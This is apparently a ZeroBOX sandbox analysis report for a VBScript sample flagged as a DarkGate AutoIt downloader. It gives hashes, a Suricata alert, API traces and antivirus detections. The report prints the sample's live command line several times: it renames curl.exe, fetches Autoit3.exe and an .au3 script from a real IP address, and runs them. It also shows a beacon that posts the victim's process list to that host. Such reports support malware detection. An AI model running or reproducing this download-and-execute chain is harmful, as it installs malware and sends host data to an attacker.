Summary | ZeroBOX

neverban_vrkvQj.vbs

[C] All Process AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6402 Sept. 26, 2023, 6:16 p.m. Sept. 26, 2023, 6:18 p.m.
Size 2.2KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 e2bcfd5fd4c45b3f95e7e9144f7495c6
SHA256 06f3cb2f6ad94c723122ced7b570673561b6dee45cc80c37ab27337b46b6c796
CRC32 896FFDDD
ssdeep 48:TKnCG7DHVxaMqcqDsTCyF9shqzZn3Fp51LDVXSrSS8N2y2xX8yCuWiLFJJ:ExalcqoTCyF9Lp11+SSS2srixP
Yara
  • VBScript_Check_All_Process - VBScript Check All Process

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
66.42.63.27 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 66.42.63.27:2351 -> 192.168.56.102:49161 2048098 ET MALWARE DarkGate AutoIt Downloader A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: The system cannot find the file specified.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'ggrn' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 'ggrn' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 'Autoit3.exe' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /c mkdir c:\ggrn & cd /d c:\ggrn & copy c:\windows\system32\curl.exe ggrn.exe & ggrn -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & ggrn -o algext.au3 http://66.42.63.27:2351/msiggrnjmvo & Autoit3.exe algext.au3
wmi Select * from Win32_Process
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c mkdir c:\ggrn & cd /d c:\ggrn & copy c:\windows\system32\curl.exe ggrn.exe & ggrn -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & ggrn -o algext.au3 http://66.42.63.27:2351/msiggrnjmvo & Autoit3.exe algext.au3
filepath: cmd
1 1 0
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.VBS.SAgent.gen
ZoneAlarm HEUR:Trojan.VBS.SAgent.gen
AVG Script:SNH-gen [Trj]
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline cmd /c mkdir c:\ggrn & cd /d c:\ggrn & copy c:\windows\system32\curl.exe ggrn.exe & ggrn -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & ggrn -o algext.au3 http://66.42.63.27:2351/msiggrnjmvo & Autoit3.exe algext.au3
cmdline "C:\Windows\System32\cmd.exe" /c mkdir c:\ggrn & cd /d c:\ggrn & copy c:\windows\system32\curl.exe ggrn.exe & ggrn -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & ggrn -o algext.au3 http://66.42.63.27:2351/msiggrnjmvo & Autoit3.exe algext.au3
host 66.42.63.27
Time & API Arguments Status Return Repeated

WSASend

buffer: POST /ggrnjmvo HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) a: System Idle ProcessSystemsmss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exelsm.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeaudiodg.exesvchost.exesvchost.exespoolsv.exesvchost.exedwm.exeexplorer.exetaskhost.exesvchost.exeIMEDICTUPDATE.EXEsvchost.exepw.exeSearchIndexer.exeSearchProtocolHost.exeSearchFilterHost.exemobsync.exetvnserver.exetvnserver.exepw.exewsqmcons.exesdclt.exetaskhost.execmd.execonhost.exepw.exewscript.exeWmiPrvSE.exe Content-Length: 0 Host: 66.42.63.27:2351
socket: 604
0 0
Time & API Arguments Status Return Repeated

WSASend

buffer: POST /ggrnjmvo HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) a: System Idle ProcessSystemsmss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exelsm.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeaudiodg.exesvchost.exesvchost.exespoolsv.exesvchost.exedwm.exeexplorer.exetaskhost.exesvchost.exeIMEDICTUPDATE.EXEsvchost.exepw.exeSearchIndexer.exeSearchProtocolHost.exeSearchFilterHost.exemobsync.exetvnserver.exetvnserver.exepw.exewsqmcons.exesdclt.exetaskhost.execmd.execonhost.exepw.exewscript.exeWmiPrvSE.exe Content-Length: 0 Host: 66.42.63.27:2351
socket: 604
0 0
parent_process wscript.exe martian_process cmd /c mkdir c:\ggrn & cd /d c:\ggrn & copy c:\windows\system32\curl.exe ggrn.exe & ggrn -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & ggrn -o algext.au3 http://66.42.63.27:2351/msiggrnjmvo & Autoit3.exe algext.au3
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c mkdir c:\ggrn & cd /d c:\ggrn & copy c:\windows\system32\curl.exe ggrn.exe & ggrn -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & ggrn -o algext.au3 http://66.42.63.27:2351/msiggrnjmvo & Autoit3.exe algext.au3
Process injection Process 3060 resumed a thread in remote process 200
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000003d0
suspend_count: 1
process_identifier: 200
1 0 0
file C:\Windows\System32\cmd.exe